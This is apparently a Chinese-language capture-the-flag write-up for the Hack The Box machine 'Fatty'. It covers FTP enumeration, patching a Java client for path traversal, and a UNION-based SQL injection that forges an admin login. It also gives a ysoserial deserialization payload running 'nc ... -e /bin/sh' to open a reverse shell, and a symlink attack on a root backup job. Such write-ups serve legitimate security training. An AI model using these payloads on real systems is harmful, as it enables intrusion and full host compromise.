基本信息

端口扫描

需要全端口扫描,有几个非常见端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
$ nmap -p- 10.10.10.174
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 12:17 CST
Nmap scan report for 10.10.10.174
Host is up (0.069s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
1337/tcp open  waste
1338/tcp open  wmc-log-svc
1339/tcp open  kjtsiteserver

Nmap done: 1 IP address (1 host up) scanned in 103.34 seconds

$ nmap -sC -sV -p 21,22,1337,1338,1339 10.10.10.174
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 12:25 CST
Nmap scan report for 10.10.10.174
Host is up (0.068s latency).

PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp      15426727 Oct 30  2019 fatty-client.jar
| -rw-r--r--    1 ftp      ftp           526 Oct 30  2019 note.txt
| -rw-r--r--    1 ftp      ftp           426 Oct 30  2019 note2.txt
|_-rw-r--r--    1 ftp      ftp           194 Oct 30  2019 note3.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.10
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh                OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
|   2048 fd:c5:61:ba:bd:a3:e2:26:58:20:45:69:a7:58:35:08 (RSA)
|_  256 4a:a8:aa:c6:5f:10:f0:71:8a:59:c5:3e:5f:b9:32:f7 (ED25519)
1337/tcp open  ssl/waste?
| fingerprint-strings:
|   GetRequest:
|     dvK.
|   HTTPOptions:
|     *{nqfU
|     B9Eq
|     ~yn'
|     \xf8
|   RPCCheck:
|     e:g@
|     \x96
|     3I\x9by
|     )rB#Z
|   RTSPRequest:
|_    smV6:
| ssl-cert: Subject: commonName=Mr. Secure/organizationName=Fatty/stateOrProvinceName=Here/countryName=DE
| Not valid before: 2019-09-11T15:42:00
|_Not valid after:  2020-09-10T15:42:00
|_ssl-date: 2020-08-05T04:26:47+00:00; -1s from scanner time.
1338/tcp open  ssl/wmc-log-svc?
| fingerprint-strings:
|   GenericLines, NULL:
|     #z*]T
|     2"{n
|     L;8q
|   GetRequest:
|     =Ktk6
|   RTSPRequest:
|_    \x1b
| ssl-cert: Subject: commonName=Mr. Secure/organizationName=Fatty/stateOrProvinceName=Here/countryName=DE
| Not valid before: 2019-09-11T15:42:00
|_Not valid after:  2020-09-10T15:42:00
|_ssl-date: 2020-08-05T04:26:47+00:00; -1s from scanner time.
1339/tcp open  ssl/kjtsiteserver?
| fingerprint-strings:
|   GenericLines, NULL:
|     'V[;
|   GetRequest:
|     X>_L
|   HTTPOptions:
|     7,TC
|     \xcf
|   RPCCheck:
|     SeM^
|     #!1K
|   RTSPRequest:
|     M)V.e/
|_    dg9wm
| ssl-cert: Subject: commonName=Mr. Secure/organizationName=Fatty/stateOrProvinceName=Here/countryName=DE
| Not valid before: 2019-09-11T15:42:00
|_Not valid after:  2020-09-10T15:42:00
|_ssl-date: 2020-08-05T04:26:47+00:00; -1s from scanner time.
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1337-TCP:V=7.80%T=SSL%I=7%D=8/5%Time=5F2A34DE%P=x86_64-apple-darwin
SF:18.6.0%r(NULL,80,"\xdcd\x88\x8c\xa1\xcf\xcd\xf1r'\.\x1d'\xa09\xd6\xebi\
SF:x0e\xe2\xc2dz\xbf\x02\x9c\xa4\xe5\x80\xbcj\+\\0\xdb\xcc\xd5t\x1a\xba}\x
SF:ddm&\xc8\|Z\xbd\x99\xfff\xdc!{\x05\xfb\xc3\xc7b\xb8\x01\x01\x137\xa9R\x
SF:be\x04\x82\x1fIb\xa7\xef\x90\x85\0\xa4\x87\x95@M\xaf\xe47Z\x01\x03\x10\
SF:x80K\xcd\x07X\xfbQ8;\x929\xf8j_\xfa\x19L\x941H\xab\x8c\xaa\x99\x04\x83V
SF:B\x99A{\x9b\x06`\xcc\xdd\xd4\xc69")%r(GenericLines,80,"\xdcd\x88\x8c\xa
SF:1\xcf\xcd\xf1r'\.\x1d'\xa09\xd6\xebi\x0e\xe2\xc2dz\xbf\x02\x9c\xa4\xe5\
SF:x80\xbcj\+\\0\xdb\xcc\xd5t\x1a\xba}\xddm&\xc8\|Z\xbd\x99\xfff\xdc!{\x05
SF:\xfb\xc3\xc7b\xb8\x01\x01\x137\xa9R\xbe\x04\x82\x1fIb\xa7\xef\x90\x85\0
SF:\xa4\x87\x95@M\xaf\xe47Z\x01\x03\x10\x80K\xcd\x07X\xfbQ8;\x929\xf8j_\xf
SF:a\x19L\x941H\xab\x8c\xaa\x99\x04\x83VB\x99A{\x9b\x06`\xcc\xdd\xd4\xc69"
SF:)%r(GetRequest,80,"u8Y\xf7\xd1\x7f\xe5\x7f\x1dOO\xfe\x08h\x97\x01\xb9\x
SF:01Y\xb0m\xb3\xe4\xbc\xef\x12\xc1\xf7n>\x16\xc5\xe2z=\x07\xdc\x0c%\x08V\
SF:xdb@\xe0N\xef\0\xb7L\xacU\]\xcc\x95OO1\xea\xd2\$wC\x19#\xa6\xba\$7h\x88
SF:\x0b\xe5\x82\x83\xe2\xd4\xbd\x8a\xc3\x1d_\xab\xbf\x89\xc1\+\x1d2xq\xbf\
SF:[\x98S\xd4\xc2\xa1\x1d\xd0v\xd7\x172\xee\x15\xbaU\x03\x05\xc8\x1d\xfd\x
SF:0b:\x8c2S\)\0\x17\xca\x8c\x14\x17dvK\.")%r(HTTPOptions,80,"\*{nqfU\x98\
SF:x04\xa0\x12\$;\xc2\x9e\xee\xf3\xe9\x7f\x90\xf2:\+\xb3\)\xa7'\x9e\x03\x9
SF:9<\x1b\x1d\xbe\xa8B9Eq\xaf<\xe7\x80\x85W\xe3b\x86\x8a,\xe3\x96\x1a\x20\
SF:xde\xd7\x87Q\xcc<E\xe6\*o\x1b\x98\xf4\x93t\x11\xa9\xe0\xf6s\xcb\xa5\x80
SF:\x19\x1b\xaa\x15\x9c\n~yn'\xe0\xaa\x8e\xd6\x97\x8d\xa1#\xcb\xfe\x94\xb9
SF:l\|\x87\x0e/\xf9\x8aW\xa1\x0b\xfc\x1dn\xe5\x7f\xb5\xa5W\x88\xb1\xb3\xf3
SF:\xa2\xcf\x95\x86\\\xf8\xcb\r")%r(RTSPRequest,80,"\x1b\x836\x8e\xe3\x1a\
SF:xe2\x08\x9e\xc8\xd3\x12Y\xcd_t\xfei\x17C\xb5\xc5\xe28\xc61\x8aE\xd9\x85
SF:}H\xc8\xb4\xc6\xc7\xc6\x96\xd5\x1f\x86\x0bp\0\xbch\xdb\xd3\xc0\[\xc9-\x
SF:c0uC\x80\xf0\xc9\x04\xc2\x95;\x1cC~\xad\xf5\x020\xf5\tS\x8d\xfe\x0fVI\x
SF:bb\xd1\x13\x97o0\xeau`\x0e\x08=\xe2JJ\(\x84\xddaO\x06\xda<\x156\x01t\xa
SF:1\xbd\x02\x9d\x97N\x03UE\x82smV6:\x94\x14\x86\x06\xd2\x8c\x19\xa64")%r(
SF:RPCCheck,80,"@\xd2\xb5\x0c\xf2\x8cm\)s\xd6\|\xddgW\|\xb2\xf5\xc5\x93\(\
SF:xaei\xbc!b\x93\x13\xd8\xd9\xf7e:g@\x86\xfeB\xad\x93sL\xb5\(Ia\x86s\xe6\
SF:xae\xd2\\\x96\xb2\x9f\x9cg\xf2\x06P\xecV\xe9\x81#\)\x9c\)T\x83\xe1_p\xe
SF:8\|@\xc0tTU\x0b\x8b\xcbK\x97\x0b\x16\*\xe3\xdc\xc74\xb3\^\xa2\x1b`\xb5\
SF:xa1\x10\xf4\xbb\xdbwc\x0c\xcc3I\\\x9by\x8e\)rB#Z\xcc\xca\x05\xb7\?\)\xb
SF:1\x95\x0c\xcd\xe3");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1338-TCP:V=7.80%T=SSL%I=7%D=8/5%Time=5F2A34DE%P=x86_64-apple-darwin
SF:18.6.0%r(NULL,80,"%\xda#\x02\xac\x9d\xae\xb6\xb1#z\*\]T\x10\xe3_\"\xd2f
SF:\xc01\x922\"{n\xf6\xc7L;8q\xce-\x8f\x17o\xafY\xf1\xfb5\$\x07\xed\xcb\xb
SF:5Q\x06\xb6r\x17I}\xac\xf1\xdb'\xac\x91\xb9\x9f\xf6\xcc\r\x84\xe2\xcf>\x
SF:17\xc8\xa0\"\x01\xa1\xe4\x85\xcf\xdf\)\t\xd8Jz\x9cQ\xfdR\xe3\x82u\x93\x
SF:96\^\x8da\xf3\x96\xc2\xe2\x98O\x96Y\xf2%\xc5\xb1\x0c\x80\x02\x98=\x9f\x
SF:94\x92\xdf\xf1\xbf\|M-\xc5c\xcfr\x97")%r(GenericLines,80,"%\xda#\x02\xa
SF:c\x9d\xae\xb6\xb1#z\*\]T\x10\xe3_\"\xd2f\xc01\x922\"{n\xf6\xc7L;8q\xce-
SF:\x8f\x17o\xafY\xf1\xfb5\$\x07\xed\xcb\xb5Q\x06\xb6r\x17I}\xac\xf1\xdb'\
SF:xac\x91\xb9\x9f\xf6\xcc\r\x84\xe2\xcf>\x17\xc8\xa0\"\x01\xa1\xe4\x85\xc
SF:f\xdf\)\t\xd8Jz\x9cQ\xfdR\xe3\x82u\x93\x96\^\x8da\xf3\x96\xc2\xe2\x98O\
SF:x96Y\xf2%\xc5\xb1\x0c\x80\x02\x98=\x9f\x94\x92\xdf\xf1\xbf\|M-\xc5c\xcf
SF:r\x97")%r(GetRequest,80,"~\xf8\0\xaf\xc7\xbc\xfa\xeb\xdc\xd3:\x16w\x05\
SF:x863\[\+\xad1}\xd2\xbb\x1f\xe0-\x8a\x93/\x154u\xb9\x0b=Ktk6\x17f\x8fc\x
SF:aeW\)8\xba\xa4\x88\xad\xa3\x84&!\xc7\|1\xb1\x8du\xb0GvN\x07\x02ZJ\xa9!H
SF:\xb6W\xc3\xb6\xa9\(\xdc\]\xd5\xbc\x08\x1a\x16\xc6JU\xe6\x04\?\xe3\xfd#\
SF:x9c\x9a\x18\xc8\xa1\xffh\x1f_\xf9\xd0\?;\x1a\x03\x17\xff\xe8\xb4\r_\x8c
SF:\xb3\xf3\x04\xe1\x9fs&\x9c\xdd\x16\x92\xfe")%r(HTTPOptions,80,"\xcc\xd2
SF:\xb7\x81h\x17Nn\xc4L\x81\xf7r\xcb\x8ezy\xd9\xeaY\rA\x10c\x9b\x88\+\x04d
SF:\xb6\x1d\x05\x14{\x8e\xf5\xce\xae\xc8E\[\xcb\x90ci\x87\tDg\x93\xab'\xdc
SF:\xcev\x99\xdfe~\xd9L\xbd\xf5&=\t-\"\xae\xdb\x8c\xac\(\xea'q\x8e\xa2\xba
SF:\.t\n\xc1s\xe6\xb8\xdd\x07uV\xafk=\x0cB\xaa5s\xc0\xf4\xb0\xaa\x9aRF\$\x
SF:f7\[X\xa9\x91\xb6\xde\xa086\x8b\x92\x94\xda\xa0\x06y\x07\x97\*h\x01")%r
SF:(RTSPRequest,80,"I\x89\x15\xdc\x1d\xa3\\\x1b\x80E`\xb4\x01\x16\xa0\xce,
SF:\xccLX%\x80\x8e\x15\x15\?\xcef\x01\x1fm\x02\x9aE\xde\xba\\/\x1a\x89\xf7
SF:;\xdf\x95\xcdC\xa0\xbc\]\xcc\xdd\?w2\xc0x\xfb\xd7s\xcf\x8f\xe7f>_\xe1\x
SF:f5W\xb2\x1e\xcdc\x1b\xa9\x0f\n\xab\x9d\xcad\xc1\xb9\x8f\+\x1e\xdd\$\xad
SF:\x87\x04\$\xc2\x86W7\xe4\x84\[H\x18\xae\xb2\xbbYx\x8b\x8d\xcf\x91\xc6&\
SF:xcfv\xc6\xe16\x14\xa3\xcfW\xfa2\xdc\xb0\xb0o\xcd\x10")%r(RPCCheck,80,"\
SF:^Mw\xfc\xa4z%\x0e\xf8\xd9\xcfI\x94\x06\xa4\xee\xea4fL\xaa\x8b\x18\x06\x
SF:e7u%\t\xb6\x80\xaadY\xb2v;\xa5a\x9c\x05\]w\x8a\x8b9\xe3\xb6\xa8C\xcb\|W
SF:\x9b\xec\x0b\x0b<P\xd4\\h\x16\x0e\x1b\x01\x9d\xce\xb0\xde/\xdb\x1d\(\xd
SF:0\xf7\xf0\xd5\x81\xd9\xf6\x06T\xc0lF\t\(p\xfb\xab\xcan\xa9\xcc\xf0yJ\xd
SF:b\xa0O\xf5G\x91\xf2z\xed\xfa\xa2\xc4\xd5\x83\xc2\xb2\xfa\xd1=\x8czY\x1a
SF:E\xb3\xde\xe4a\x89\x8a\xdf");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1339-TCP:V=7.80%T=SSL%I=7%D=8/5%Time=5F2A34DE%P=x86_64-apple-darwin
SF:18.6.0%r(NULL,80,"\xfa!\xb47\x9d\xb8\x9e\"\xe1\xe5\xaapi-\xe1\x1eT\x96w
SF:\x86\x93\xba\x9caf\xb4\xe6\xcf\xcf\xa6zS\xdf\x1d\x96\xcb'V\[;\xe2\['\x1
SF:4\+\xe8\xc3\x8a\x9cC\xbcp\x03\xd2\\'vF\x83\xbdv\x1f\$N\xfdL\x99\x8a\x87
SF:@3{\xfb4b\r\x9f_\x97X\xa5{\xc7\xe0_\xc6HV\xa7\xf5d@\xae\xdat\x03\xb6\x1
SF:d\xd0\x92b\x83\x7f\xcby\xf6\+3\xd1L\xabn\0\xddR\xd5\xd0\xb9\xf6\xc9\x9f
SF:0\x96\x0e=O\x90\x8b")%r(GenericLines,80,"\xfa!\xb47\x9d\xb8\x9e\"\xe1\x
SF:e5\xaapi-\xe1\x1eT\x96w\x86\x93\xba\x9caf\xb4\xe6\xcf\xcf\xa6zS\xdf\x1d
SF:\x96\xcb'V\[;\xe2\['\x14\+\xe8\xc3\x8a\x9cC\xbcp\x03\xd2\\'vF\x83\xbdv\
SF:x1f\$N\xfdL\x99\x8a\x87@3{\xfb4b\r\x9f_\x97X\xa5{\xc7\xe0_\xc6HV\xa7\xf
SF:5d@\xae\xdat\x03\xb6\x1d\xd0\x92b\x83\x7f\xcby\xf6\+3\xd1L\xabn\0\xddR\
SF:xd5\xd0\xb9\xf6\xc9\x9f0\x96\x0e=O\x90\x8b")%r(GetRequest,80,"\xfe\x03\
SF:x87-\^\xe3\xec\x80\xc2\xce7g\xdd\xcc\x0f\xfeQE6\xd8\xd6\xd1b\x93\xef\[>
SF:1\xc0\xcd\x1ct\xf5\x0b\xd2R\xfa\xd6\x9f\x17\x9f\x0et\xab\x9a`M\x98`=k\x
SF:de\xcd\xbe\xee\x1f\x93\x07\xe1\*\x86\x14\x07\x14X>_L\xc3\x8c~\xe1T\xe1\
SF:x9b\0\xce\xac\x04\xfb\xa7\xfc\xfd\xe8\xe0\xd2M\xe3\x85\x881\xf8\xd3\xd4
SF:uY\xb6{\x01\xd4\xb9=f\x87\x91\xf5\xccEG\xbb5\*>\xf1!\xd4\x89\xb5%\x94\x
SF:18\x92\x17\xdfH\xfe\xc4v")%r(HTTPOptions,80,"\xe4\x8d7,TC\xa1\x8f\x10\x
SF:85\x94\xd4hY\x9a\x84\xc3R\^\xf8\xe6\x9f:\xa2JQ\x0c\xd1\xc6\x1e\x8c\xff\
SF:xf3\x9c\x9fZ\xd9b\x1a\xda\x07\xc7\xaf\xbddO\x17\xe0\xd9\xcc\xfe\xc2\x0b
SF:\xae\xf6\xc4\x12=\xd4\x05\xc2\x93\xa2\x16\x9b>u\x94\xdd\x08\xed\xed\xb3
SF:{\xa7\xe3=\r\x89\x0fBe\x86\xc7:\xae\xc7\x1a\xb8\xf8C\xe8\xf3\x9f\\\xcf\
SF:xdb\x9a\x8a\r@\x8c\x99\x8b\"\xa6#8\t!9~\x80\xdc\xc8\xa7\xf6n\x81\n\x18j
SF:w\xf2\x17\xe7>\xc4")%r(RTSPRequest,80,"#V\xa5\xb4\x03\xe1>\x9b\x82\xc7V
SF:\x01G\x1d\xa3\xecm\]\x12N}\x96\xa0xH\xdb\)d\x86i\xe7\^\0\x0bx\xe5\(\xcb
SF:\xf0\x18\xc9\x1c\x94\x91\xaaM\)V\.e/\x8f\xca\xb7\x18\xb5\xde\x04\x1a\x0
SF:8\[\x88\xd5\xc2\x0f\xb5dg9wm\xb1\xcb\xba\xa1\xcf6zU\xfc\xe92\xa8\x8bR\x
SF:18\xf0\n\x1a\xf2\xd8\x86\x1e\xd7\xd9{\xde\xa4\xda\xa1>l\x14E\xef2\x1b\x
SF:9d\x9e\xd3\^\x10\|\x8a\x1e\x112\xb0\xa6\xda\xd0!\xb7E\xad8T\xbf")%r(RPC
SF:Check,80,"\(\xae`\r5\x88\x9d@F\xa0\xe6\x85\x9fSeM\^\x17\xb6e\xd1/\xbc\x
SF:e8A\xcd\xa4\x10\n\x05\x0fT\xdc\xa1\xb1q\x91\xa9\xf5`\xc2`\x90W\x19\x8c\
SF:x0eVI\x86\x80\x12\xd4\x1cK\xfc\xe4\xadfS\xf7,\xf3\xdc\xa5t\xce\x9df\x91
SF:I\xb4\xc8F\xac\xa6b\x89\xea\xe9\xf5\xafq\xf3\x13\xa1\x1bP\x18\xe0#!1K\x
SF:c6M\x96\xe9\xf9\xcd\xc7\xe3\xb0\*\xe5\x8c\x12\xc6\xda\xef\xc2\xe9\x965\
SF:x98\x9fW\xc3\xf9\x0fEgn\x17iy\0\xc3");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.67 seconds

21

FTP可以匿名访问,里面有一些文件,下载下来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
➜  Fatty ftp 10.10.10.174
Connected to 10.10.10.174.
220 qtc's development server
Name (10.10.10.174:miao): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote pasv
227 Entering Passive Mode (10,10,10,174,185,136).
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (10,10,10,174,187,39).
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp      15426727 Oct 30  2019 fatty-client.jar
-rw-r--r--    1 ftp      ftp           526 Oct 30  2019 note.txt
-rw-r--r--    1 ftp      ftp           426 Oct 30  2019 note2.txt
-rw-r--r--    1 ftp      ftp           194 Oct 30  2019 note3.txt
226 Directory send OK.
ftp> get *
local: * remote: *
227 Entering Passive Mode (10,10,10,174,193,90).
550 Failed to open file.
ftp> mget *
mget fatty-client.jar?
227 Entering Passive Mode (10,10,10,174,179,171).
150 Opening BINARY mode data connection for fatty-client.jar (15426727 bytes).
226 Transfer complete.
15426727 bytes received in 23.40 secs (643.7956 kB/s)
mget note.txt?
227 Entering Passive Mode (10,10,10,174,179,86).
150 Opening BINARY mode data connection for note.txt (526 bytes).
226 Transfer complete.
526 bytes received in 0.00 secs (3.1549 MB/s)
mget note2.txt?
227 Entering Passive Mode (10,10,10,174,179,254).
150 Opening BINARY mode data connection for note2.txt (426 bytes).
226 Transfer complete.
426 bytes received in 0.00 secs (308.3882 kB/s)
mget note3.txt?
227 Entering Passive Mode (10,10,10,174,162,237).
150 Opening BINARY mode data connection for note3.txt (194 bytes).
226 Transfer complete.
194 bytes received in 0.00 secs (142.7680 kB/s)
ftp>

3个txt和一个jar文件:

那个jar文件应该是连接某个服务的客户端,那个服务原本是8000端口,现在改成了1337端口,并且给出了运行环境问题和一组账号密码:

1
2
User: qtc
Pass: clarabibi

fatty-client.jar

代理连接

直接运行是连接失败:

根据前面的信息,以及反编译看代码,我们知道客户端配置的是8000端口,而现在服务是在1337端口,我们需要想办法进行转发(或者直接修改代码重新打包,需要解决签名校验):

这里可以直接用simpleproxy之类的做个代理,并且配置好hosts:

1
2
3
4
simpleproxy -L 8000 -R 10.10.10.174:1337

# hosts
10.211.55.12 server.fatty.htb

然后就可以成功登录:

修改重打包

直接反编译修改重新打包运行的话,会有一个签名校验问题:

修改后重新打包:

1
jar -cmf META-INF/MANIFEST.MF ../new.jar *

运行登录会得到如上报错,存在校验,beans.xml被修改导致不匹配,SHA-256 digest error for beans.xml

可以直接把 META-INF/1.RSA META-INF/1.SF这两个文件删了,然后打包,就可以解决签名校验问题:

文件浏览

有一个文件浏览功能,限定目录,根据报错可以得到基础路径:/opt/fatty/files/

(
(

反编译可以看到这个功能应该是在Invoker中的showFile函数中将Folder作为参数,sendAndRecv

另外ClientGuiTest中定义目录名,我们可以修改后获取其他目录文件:

例如将config目录修改成..,从而查看上层目录文件

下面是直接修改jd-gui反编译的java文件,然后patch到原本的jar

1
2
3
4
5
6
7
8
9
10
zip -d fatty-client.jar META-INF/1.RSA META-INF/1.SF
zip -ur fatty-client.jar .

javac -cp ../fatty-client.jar htb/fatty/client/gui/ClientGuiTest.java
mkdir raw
cp fatty-client.jar raw/fatty-client.jar
cd raw && unzip fatty-client.jar
cd .. && mv htb/fatty/client/gui/*.class raw/htb/fatty/client/gui/
cd raw && jar -cmf META-INF/MANIFEST.MF traverse.jar .
java -jar traverse.jar

然后发现一个fatty-server.jar文件:

start.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/sh

# Unfortunately alpine docker containers seems to have problems with services.
# I tried both, ssh and cron to start via openrc, but non of them worked. Therefore, 
# both services are now started as part of the docker startup script.


# Start cron service
crond -b

# Start ssh server
/usr/sbin/sshd

# Start Java application server
su - qtc /bin/sh -c "java -jar /opt/fatty/fatty-server.jar"

fatty-server.jar

下载文件

这里我们修改open函数用于下载fatty-server.jar文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import java.io.FileOutputStream;
...
  
FileOutputStream fos;
                fos = new FileOutputStream("/tmp/fatty-server.jar");
                if (this.response.hasError()) {
                    return "Error: Your action caused an error on the application server!";
                }
                String response = "";
                try {
                    response = this.response.getContentAsString();
                } catch (Exception e) {
                    response = "Unable to convert byte[] to String. Did you read in a binary file?";
                }
                fos.write(this.response.getContent());
                fos.close();
                return response;

...

之后重新打包运行,下载得到fatty-server.jar文件:

反编译

同样是反编译,然后FattyDbSession.java:checkLogin(User user)有一个注入:

就是客户端登录时username那里注入

User

htb/fatty/client/shared/resources/user.java得到密码加密方式,username没经过任何处理:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
public User(int uid, String username, String password, String email, Role role) {
    this.uid = uid;
    this.username = username;
    String hashString = this.username + password + "clarabibimakeseverythingsecure";
    MessageDigest digest = null;
    try {
      digest = MessageDigest.getInstance("SHA-256");
    } catch (NoSuchAlgorithmException e) {
      e.printStackTrace();
    } 
    byte[] hash = digest.digest(hashString.getBytes(StandardCharsets.UTF_8));
    this.password = DatatypeConverter.printHexBinary(hash);
    this.email = email;
    this.role = role;
  }

注入

基本就是分析代码,构造注入, 客户端也需要做下修改方便操作:

然后使用:

1
2
Username : abc' UNION SELECT 1,'abc','a@b.com','abc','admin
Password : abc

这样拼接成的sql是:

1
SELECT id,username,email,password,role FROM users WHERE username='abc' UNION SELECT 1,'abc','a@b.com','abc','admin

然后就可以伪造管理员登录:

反序列化

登录后修改密码功能有反序列化:

参考资料:

修改密码功能在客户端没完全实现,需要自己修补代码

添加功能

首先修改changePW函数,使其发送payload:

1
2
3
4
5
6
7
8
9
public String changePW(String payload) throws MessageParseException, MessageBuildException, IOException {
                this.action = new ActionMessage(this.sessionID, "changePW");
                this.action.addArgument(payload);
                sendAndRecv();
                if (this.response.hasError()) {
                    return "Error: Your action caused an error on the application server!";
                }
                return this.response.getContentAsString();
            }

然后修改changePW执行函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
jButton4.addActionListener(new ActionListener() {
                public void actionPerformed(ActionEvent param1ActionEvent) {
                    String str1 = "";
                    String str2 = ClientGuiTest.this.textField_1.getText();
                    try {
                        str1 = ClientGuiTest.this.invoker.exploitChangePW(str2);
                    } catch (MessageBuildException|htb.fatty.shared.message.MessageParseExceptionmessageBuildException) {
                        JOptionPane.showMessageDialog(controlPanel, "Failure during message building/parsing.", "Error", 0);
                    } catch (IOException iOException) {
                        JOptionPane.showMessageDialog(controlPanel, "Unable to contact the server. If this problem remains, please close and reopen the client.", "Error", 0);
                    }
                    textPane.setText(str1);
                    passwordChange.setVisible(false);
                    controlPanel.setVisible(true);
                }
            });

我这里不小心删掉了修改好的jar包,不想重新开始一点点改了,后面的主要就是流程

反序列化getshell

然后就是生成序列化payload,监听端口,修改密码发送payload,getshell:

1
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'nc 10.10.14.22 7777 -e /bin/sh' | base64 -w 0

user flag

反序列化得到qtc用户的shell,user.txt没有读权限自己加一下就可以,得到user flag:

1
2
3
chmod +r user.txt
cat user.txt
7fab****2073

提权信息

这一步是有一个定时任务:

1
scp qtc:<container_ip>:/opt/fatty/tar/logs.tar /unknown/location/logs.tar

如果我们使用软连接,将/root/.ssh/authorized_keys软连接到/opt/fatty/tar/logs.tar,然后它会自动scp到host之后解压,导致:

/unknown/location/logs.tar -> /root/.ssh/authorized_keys

然后我们把公钥写到logs.tar,等待下一次备份即可覆写server的/root/.ssh/authorized_keys

然后我们直接用自己的私钥即可登录:

root flag

登录上去直接读root.txt:

ee98****d9c7

参考资料